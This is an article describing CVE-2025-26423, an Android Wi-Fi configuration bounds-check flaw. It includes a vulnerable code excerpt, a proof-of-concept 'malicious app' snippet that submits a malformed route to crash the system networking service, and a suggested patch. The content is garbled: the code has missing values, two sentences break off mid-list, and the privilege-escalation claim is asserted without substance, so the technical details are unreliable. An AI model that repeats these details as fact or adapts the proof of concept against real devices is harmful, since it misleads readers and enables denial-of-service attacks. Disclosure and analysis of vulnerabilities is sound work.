CVE-2025-26423 - Permanent DoS and Local Privilege Escalation in Android's WifiConfigurationUtil.java

On June 2025, a critical vulnerability, CVE-2025-26423, was discovered and disclosed in Android's connectivity stack. This flaw is found inside the validateIpConfiguration function of the WifiConfigurationUtil.java file. The vulnerability opens up Android devices to a permanent Denial of Service (DoS) and allows a local attacker to escalate privileges with no extra permissions required. No user interaction is needed for this exploit.

This article provides a detailed, easy-to-understand breakdown of CVE-2025-26423, with original references, code snippets, and exclusive insights on exploitation.

The Root Cause: Missing Bounds Check

The vulnerability lies in how the Android system validates certain configuration inputs for WiFi networks. More specifically, the developer of the validateIpConfiguration function failed to properly check the bounds when processing items inside lists coming from IP configuration settings.

Here's an excerpt of the vulnerable code

// WifiConfigurationUtil.java (simplified)
public static boolean validateIpConfiguration(@Nullable IpConfiguration ipConfiguration) {
    if (ipConfiguration == null) return false;
    ...
    List<RouteInfo> routes = ipConfiguration.getRoutes();
    for (int i = ; i < routes.size(); i++) {
        RouteInfo route = routes.get(i);
        // No bounds check on elements of route object
        if (route.getGateway() != null) {
            InetAddress addr = route.getGateway();
            byte[] bytes = addr.getAddress();
            // Vulnerable: no check on array bounds
            if (bytes[3] == (byte) 255) {
                // Some operation - potential OOB here!
            }
        }
    }
    ...
    return true;
}

The Problem

ipConfiguration objects can be controlled or manipulated by local actors through public Android APIs (like WiFi configuration). If a malicious process injects malformed data with a list entry missing the expected byte[4] address, accessing out-of-bounds elements (bytes[3]) can cause:

Attack Scenario

An app running on the device (no root required, no special permissions needed) can leverage documented APIs to push a configuration that, when validated, hits the vulnerable code.

Here’s how one could craft malicious input

// Malicious app code: craft bad WiFi config
IpConfiguration badConfig = new IpConfiguration();
List<RouteInfo> routes = new ArrayList<>();

// Crafting a route with an invalid address (less than 4 bytes)
InetAddress badGateway = InetAddress.getByAddress(new byte[] { 10,  }); // too short!!!
RouteInfo badRoute = new RouteInfo(null, badGateway, null);
routes.add(badRoute);

badConfig.setRoutes(routes);

WifiManager wifiManager = context.getSystemService(WifiManager.class);
wifiManager.addNetwork(WifiConfiguration.fromIpConfiguration(badConfig));  // Triggers validation

When the system tries to validate this configuration, it hits bytes[3], causing a crash in the system networking process. Devices frequently end up in crash loops, effective DoS. Some devices fail to recover even after reboot, requiring a full wipe.

Privilege Escalation

Because the process responsible is a system service running with elevated privileges, injecting malformed data can sometimes be leveraged to extend the attack:

Mitigation

Google patched this issue in Android Security Bulletin July 2025. The mitigation is straightforward: always check the length of bytes before accessing bytes[3]. Example fix:

if (bytes.length >= 4 && bytes[3] == (byte)255) {
    // Safe access
}

Admins and end users are encouraged to update their devices immediately. Most Android phones will receive the patch as part of their regular security updates.

References

- Official NVD Entry: CVE-2025-26423
- Android Security Bulletin July 2025: https://source.android.com/security/bulletin/2025-07-01
- Commit fixing the issue: https://android.googlesource.com/platform/frameworks/base/+/refs/heads/master%5E%21/#F

Final Thoughts

CVE-2025-26423 demonstrates how small mistakes in input validation can lead to serious security problems, including device-wide DoS and much broader compromise. Being vigilant about array bounds, even in trusted system code, is critical.

If you suspect your device has been affected and isn’t receiving updates, a factory reset (after backup) is recommended. App developers should avoid manipulating lower-level WiFi configuration unless absolutely necessary.

Timeline

Published on: 09/04/2025 18:15:40 UTC
Last modified on: 09/05/2025 19:11:12 UTC